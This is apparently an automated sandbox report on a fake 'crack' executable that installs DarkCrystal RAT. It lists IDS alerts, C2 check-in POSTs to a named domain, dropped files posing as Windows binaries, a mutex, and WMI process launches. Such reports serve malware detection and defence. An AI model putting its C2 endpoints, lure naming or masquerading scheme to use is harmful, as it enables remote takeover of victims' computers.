                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52270 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52273 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49882 -> 104.21.80.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52277 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52276 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52274 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52280 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52279 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52272 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52275 -> 104.21.48.1:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: global trafficTCP traffic: 192.168.2.9:52212 -> 162.159.36.2:53
                                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /UpdatesqlCdn.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 237025cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /UpdatesqlCdn.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 237025cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 237025cm.n9shteam.in
                                    Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                                    Source: unknownHTTP traffic detected: POST /UpdatesqlCdn.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 237025cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:17:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hv6AXVENQPFAg%2BT52K2QdTC7osc7Ath%2F3eelVnd%2FeVxxC49VFN8lpuS6BPS3bbSWnipcpvPOWV9z%2F2nJ1IjbZIWPe4Fe6vkkmrgEnT99vReBAb0eqGnp5vBV70Rmy%2Fkpk4rGiDkNKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015526b3feac443-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2886&min_rtt=1686&rtt_var=3033&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=129329&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:17:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fs90pKoEXzLjXiSDTycAoqO2ZJm4jnTr8TwTqDY7%2F96d4%2F5Ycyz%2B63SfLQxmyUGdJYMNWxBWy2%2BdRKNbpcrKxSsdw2AiwPPPmjooin4Xj%2FqDZ%2F%2F0EgHdHjYDpjD4i%2BwLEVmpLFEbjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015529edc7a7d0e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4043&min_rtt=1920&rtt_var=4967&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=77211&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.00000000035AA000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://237025cm.n9shteam.in
                                    Source: smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://237025cm.n9shteam.in/
                                    Source: GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://237025cm.n9shteam.in/UpdatesqlCdn.php
                                    Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: BlockcontainerWin.exe, 00000005.00000002.1496547817.0000000003B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000018.00000002.2983617268.0000023D3C516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2984347585.000002C598DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2966511703.000001FE26B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001C6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_001C6FAA
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001C848E0_2_001C848E
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D40880_2_001D4088
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D00B70_2_001D00B7
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001C40FE0_2_001C40FE
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D71530_2_001D7153
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001E51C90_2_001E51C9
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D62CA0_2_001D62CA
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001C32F70_2_001C32F7
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D43BF0_2_001D43BF
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001CC4260_2_001CC426
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001ED4400_2_001ED440
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001CF4610_2_001CF461
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D77EF0_2_001D77EF
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001C286B0_2_001C286B
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001ED8EE0_2_001ED8EE
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001CE9B70_2_001CE9B7
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001F19F40_2_001F19F4
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D6CDC0_2_001D6CDC
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001D3E0B0_2_001D3E0B
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001E4F9A0_2_001E4F9A
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001CEFE20_2_001CEFE2
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D8083050_2_00007FF887D80830
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D922AB50_2_00007FF887D922AB
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D9232350_2_00007FF887D92323
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887DA0A2550_2_00007FF887DA0A25
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887DB0FD350_2_00007FF887DB0FD3
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887DB0F6150_2_00007FF887DB0F61
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 55_2_00007FF887D50D7855_2_00007FF887D50D78
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BAOTDPUV.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: String function: 001DEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: String function: 001DF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: String function: 001DEC50 appears 56 times
                                    Source: ZFTyARuY.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: JDNtgNEK.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: qmbOMItv.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: gDHycgoN.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: lhCxVqkE.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: medFrqzz.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: USBzXUek.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: BAOTDPUV.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: sXGeTWEn.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: Rfxshdov.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ssnNFABl.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: blWilNVX.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: oCwXyDAs.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: VlKreyqd.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: DYilKdVO.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: kHvGrYKy.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: JRLLnIaC.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: rEjFTmFn.log.38.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: BwtLSSWj.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: EErUokRe.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: uQMeEZWw.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: BOAdhoQl.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: rfhNxLLD.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ZTFIdpqp.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: OfbStevG.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: wSzMZIas.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: npqXqOLK.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: NursultanAlphaCrack.bat.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs NursultanAlphaCrack.bat.exe
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@58/78@3/1
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001C6C74 GetLastError,FormatMessageW,0_2_001C6C74
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_001DA6C2
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exeJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\lhCxVqkE.logJump to behavior
                                    Source: C:\Program Files\Windows NT\smss.exeMutant created: NULL
                                    Source: C:\Program Files\Windows NT\smss.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2024:120:WilError_03
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\AppData\Local\Temp\4PyWtYxh61Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCommand line argument: sfxname0_2_001DDF1E
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCommand line argument: sfxstime0_2_001DDF1E
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCommand line argument: STARTDLG0_2_001DDF1E
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCommand line argument: xz!0_2_001DDF1E
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: NursultanAlphaCrack.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
